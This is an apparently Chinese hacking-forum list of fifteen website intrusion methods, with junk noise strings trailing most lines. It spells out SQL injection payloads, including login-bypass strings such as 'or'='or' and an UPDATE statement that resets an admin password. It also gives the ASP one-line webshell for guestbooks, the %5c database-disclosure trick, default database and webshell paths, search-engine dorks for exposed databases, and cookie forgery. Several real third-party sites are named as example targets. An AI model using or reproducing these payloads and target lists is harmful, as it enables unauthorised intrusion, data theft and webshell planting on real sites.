1.上传漏洞[不多讲] v=ybI]  
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传
2.注入漏洞[不多讲] Q%V}A!  
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: f< F!CwJ  
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'--   [admin为表名.] c"S k{ :  
hwgTrdq  
$>tT@!foz  
3.旁注,也就是跨站. C^fb {F(  
我们***某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来***我们 要***的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了 G\'/}  
1qy{M<-r  
*meyAB^,Z  
4.暴库:把二级目录中间的/换成%5c %'+%V(  
EY: [url]http://www.scbzlx.com/test/test/test.asp?test=test&test=1[/url] pQRoc\d)7  
如果你能看到:'E:\test\test\database\test.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。 *P/hAJS]  
这样的就是数据库了。 下载时用FLASHGET换成.MDB格式的就行. ET#e eH%~  
{%x,r:h0  
fJ[\l_.  
5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: 6id,$t[  
'or''=' " or "a"="a   ') or ('a'='a   ") or ("a"="a   or 1=1--   ' or 'a'='a @B2t},~q'  
+`]} '\ @<  
6.社会工程学。这个我们都知道吧。就是猜解。 Yb\Z0?p,  
&DyrNXT2  
*nT8Wq:_  
7.写入ASP格式数据库。就是一句话 ***[<%execute request("value")%> ],常用在留言本. u8vP37"}  
EY: [url]http://www.scbzlx.com/book/book.asp[/url][这个就是ASP格式的数据库],再写入一句话*** 6Qbj <&V  
4FVj.j%  
,,!\=I}  
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. W2EgRe/f4  
EY: [url]http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp[/url] [^wy&V7  
这个站用的是:杰出校友录,源码我下过了, u$O0MvraN  
默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin -`8P|^'  
t5t-qOp  
&K!T1T  
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. jh\d6;vXl  
/Databackup/dvbbs7.MDB ltq8Dc#5  
/bbs/Databackup/dvbbs7.MDB dT2LeS)  
/bbs/Data/dvbbs7.MDB 4u?[@"W%  
/data/dvbbs7.mdb u ffYTA0  
/bbs/diy.asp z>^vnD&T  
/diy.asp f\C@xz`  
/bbs/cmd.asp z OLE*G :  
/bbs/cmd.exe BZusI/gNX  
/bbs/s-u.exe ] S.zYe  
/bbs/servu.exe co1 3s?x  
工具:网站猎手 挖掘鸡 0_-Pizp0  
EY: [url]http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB[/url] s}wIS$RQQq  
%4RknJb-  
10.查看目录法:人一些网站可以断开目录,可以方问目录。 tknn{fy  
EY: [url]http://www.ujs168.com/shop/admin/[/url] hsQlF  
[url]http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/[/url] yBE:Lw[uw  
这样我们可以找到数据库,下载不用我教吧 5FmEt]O>  
Y+G*k8  
11.工具溢出:.asp?NewsID=   /2j.asp?id=18   .asp?id=[这种方法可以取得大量的WEBSHELL] 6q&3@Sr  
E Ou3FQ  
12.搜索引擎利用: r3+y)/  
LCVZ{gHO*  
(1).inurl:flasher_list.asp   默认数据库:database/flash.mdb   后台/manager/ UQ !HF-  
(2).找网站的管理后台地址: h?Q(jl0GL  
site:xxxx.comintext:管理 p]OoOe  
site:xxxx.comintitle:管理   <关键字很多,自已找> d#cWC a>  
site:xxxx.cominurl:login w5,Y7](  
(3).查找access的数据库,mssql、mysql的连接文件 xt@\T(O  
allinurl:bbsdata %#6r^bk  
filetype:mdbinurl:database PnW2e3K  
filetype:incconn V.SEm%K  
inurl:datafiletype:mdb Q+Bm_,U@~  
l|-b.n  
y\%ZV_#  
13.COOKIE诈骗: w ku=Y  
w/.RG+  
把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了 zo|Vg2X  
Sq:-e5TmE6  
nc /]k34e  
14.利用常见的漏洞:如动网BBS H /P (Ob  
{Hj>.N R[  
可以先用:dvbbs权限提升工具,使自已成为前台管理员。 3LbKt&I8  
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 +,s*_f%Qyc  
XcczgklA  
15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE